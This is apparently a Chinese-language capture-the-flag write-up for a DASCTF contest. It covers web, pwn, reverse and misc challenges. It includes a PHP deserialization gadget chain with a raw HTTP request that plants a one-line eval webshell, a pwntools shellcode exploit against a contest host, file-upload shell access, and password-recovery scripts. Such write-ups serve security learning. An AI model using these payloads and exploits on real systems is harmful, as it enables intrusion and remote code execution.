文章目录
- Web
- PHP's Ending
- web-game-1-1
- can_you_getshell
- Pwn
- babyshell
- Reverse
- packed
- Misc
- edocne
- Baby_TCP
Web
PHP’s Ending
反序列化
、eval截断
、无参数RCE
<?php// error_reporting(0);// highlight_file(__FILE__);class saday{public $reason="things dont work as i expecting";
public function __construct($reason) {$this->reason = $reason;
}
public function __destruct(){echo "today is a saday....,because".$this->reason."\n";}
}
class chance{public $choice;public $better;public function __construct($better) { $this->better = $better;}public function __clone(){($this->better)();}
}class alright{public $confidence;public $tmp;public function __construct($confidence,$tmp) { $this->confidence = $confidence;$this->tmp = $tmp;}public function __toString(){$this->tmp=clone $this->confidence;return "alright...";}
}
class shell{public $cmd;public function __construct($cmd) { $this->cmd = $cmd;}public function __invoke(){echo "invoke";if("moonsy"===preg_replace('/;+/',"moonsy",preg_replace("/[A-Za-z_]+\(+|\)/","",$this->cmd))){echo 'moonsymoonsy';eval($this->cmd."moonsy");}}
}$chance = new shell('eval(next(getallheaders()));__halt_compiler();');
// $chance = new shell('phpinfo();__halt_compiler();');
$tmp = new chance($chance);
$alright = new alright($tmp,$tmp);$saday = new saday($alright);
$a = serialize($saday);
echo urldecode($a);
echo "\n";
然后在写入一个webshell反弹
POST / HTTP/1.1
Host:80.endpoint-b3f1d96476b845ae903a4eb2b0350bd6.m.ins.cloud.dasctf.com:81
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: system("echo '<?php @eval(\$_POST[1]);?>' >1.php");
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
test:idmoonsy=O:5:"saday":1:{s:6:"reason";O:7:"alright":2:{s:10:"confidence";O:6:"chance":2:{s:6:"choice";N;s:6:"better";O:5:"shell":1:{s:3:"cmd";s:46:"eval(next(getallheaders()));__halt_compiler();";}}s:3:"tmp";r:3;}}
webshell反弹之后在根目录下看到secret.txt
,里面存着用户boogipop
的密码
passwd:just_a_tricksu boogipop
之后直接cat /flag
就行
web-game-1-1
在源码中飞机爆炸处理之后有一个GET参数请求
直接传scores
即可获得flag:/useful.php?scores=1000000000
can_you_getshell
给了源码,但是登录后台需要账号密码,但是/admin/insert_php
能直接任意文件上传
可以直接把下面的提交html代码复制出来,修改提交地址
然后抓包传Shell
直接蚁剑连接,根目录下有flag
Pwn
babyshell
Exp
from pwn import *
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', log_level = 'debug') #infopath = "./babyshell"#p = process(path)
p = remote('tcp.cloud.dasctf.com', 28992)
elf = ELF(path)
libc = elf.libcdef g():gdb.attach(p)raw_input()sl = lambda arg : p.sendline(arg)
sla = lambda arg1, arg2 : p.sendafterline(arg1, arg2)
sd = lambda arg : p.send(arg)
ru = lambda arg : p.recvuntil(arg)
inv = lambda : p.interactive()shellcode = asm(
"""
mov rax, 0x101
mov rdi, 0x20
push rsi
mov rbx, 0x67616c662f
push rbx
mov rsi, rsp
xor rdx, rdx
syscallmov rdi, rax
xor rax, rax
pop rsi
pop rsi
mov rbx, rsi
add rbx, 0x500
push rsi
mov rsi, rbx
mov rdx, 0x200
syscallxor rax, rax
inc rax
mov rdi, 1
syscall"""
)sl(shellcode)inv()
Reverse
packed
拖入发现是upx
的壳
直接使用upx
脱壳失败,使用16进制编辑器将前三个PAC
改成 UPX
,然后脱壳
根据下面两个判断推测是一个魔改的RC4
,使用的是加法
查看密文是34
位,直接输入34
个a
,然后将input
中的数据提取出来
Exp
#include<stdio.h>int main()
{unsigned char enc[] = {0x9E, 0x56, 0x81, 0x83, 0xBF, 0x4F, 0x7D, 0x83, 0xF0, 0x69, 0x0D, 0xBF, 0x7A, 0x86, 0xF7, 0x21, 0x5C, 0x04, 0x5F, 0x74, 0x64, 0xA5, 0x95, 0xCF, 0x6A, 0x72, 0x7E, 0x01, 0xF9, 0xC9, 0x9F, 0x51, 0xD3, 0x5F};unsigned char data[] = {0xBB, 0x76, 0x8F, 0xA1, 0xCC, 0x6A, 0x63, 0x8F, 0xE3, 0x5A, 0x3A, 0xBD, 0x70, 0x82, 0xF4, 0x23, 0x5B, 0xEC, 0x61, 0xA1, 0x66, 0x9F, 0x84, 0xFD, 0x97, 0x5F, 0x80, 0x1A, 0x19, 0xE7, 0xB5, 0x6D, 0xE2, 0x43};for(int i = 0; i < 34; i++){printf("%c", (unsigned char)(enc[i] - (unsigned char)(data[i] - 'a')));}return 0;
}// DASCTF{Unp4cked_by_4_gr34t_HACKER}
Misc
edocne
根据题目名称为encode
的逆序,推测有逆序
逆序->base58->逆序->base64
,解压里面的是firefox
取证,以前做过一样的,GKCTF X DASCTF应急挑战杯Misc-Writeup FireFox Forensics:https://mochu.blog.csdn.net/article/details/118365556
直接脚本搜哈:https://github.com/lclevy/firepwd
Baby_TCP
pwd1.txt
、pwd2.txt
是4字节CRC爆破明文
PS C:\Users\Administrator\Downloads> php -r "var_dump(hex2bin('50615334576f7234'));"
Command line code:1:
string(8) "PaS4Wor4"
解hex得到压缩包密码: PaS4Wor4
zip.pcapng
的data.data
字段是传输数据的
直接tshark
提取即可:tshark -r zip.pcapng -T fields -Y "data.data" -e data.data
直接丢进CyberChef解Hex
得到压缩包十六进制,简单处理下
zipData = "504b03041400010063003b865c56dd78da02f1000000d500000008000b00666c61672e74787401990700020041450300000783f4951373ddd080270982f705af88c0f9aa51e18d6c4f2dccbc3175fc85b18627cc162b426af443183d769c17adfbd9ae9bb4eb452d953508027dc6931dcbd32db10ecf9f2839a91f5980399ecd78b4d749b3033f5c42a7fdb3b2a92727ecab2380f53aaede40e141899b6a9584835f1de92843385939d942d3508e818f8851a31b23910defe4703c8c26d052dc4bc9cd7a2f94b7284e42fcda6d94515a92fca3895b580f0c74fe0122a06b90ed10213e0892e21c59f763bb50b0fd6ed583600e88e8a1ac95db6cd54cd934023906ddcb44f883deed7fe924a46a91feab42de1a4728bb78e717da3cb8c5f139fc2241504b010214001400010063003b865c56dd78da02f1000000d500000008002f000000000000002000000000000000666c61672e7478740a0020000000000001001800d322ee9f514bd901ab9112a0514bd9012d75a92f504bd9010199070002004145030000504b0506000000000100010065000000220100000000"
with open('flag.zip', 'wb') as f:f.write(bytes.fromhex(zipData))
继续查看password.pcapng
,发现data.data
也有数据
但是提取出来没有正确的密码,继续查看发现端口存在异常,要么101
要么100
猜测最后一位为二进制
提取出来:tshark -r password.pcapng -T fields -Y "data.data" -e tcp.dstport
注意是含有data.data
的端口,提取出来转化处理
binContent = ""
with open('data3.txt', 'r') as f:lines = f.readlines()for line in lines:binContent += line.strip()[-1]
print(binContent)
解码二进制
得到压缩包密码,解压得到flag: Welcome to DASCTF. Congratulations. The password is DZhqDrck2LHX2kXWdcHuYhsX
You 3r4 v4ry sm3rt!
You 3r4 v4ry sm3rt!
You 3r4 v4ry sm3rt!Thank you for your love for CTF!
Thank you for your love for CTF!
Thank you for your love for CTF!DASCTF{b4a7c67f-5236-4bce-bcbe-1a2359337d49}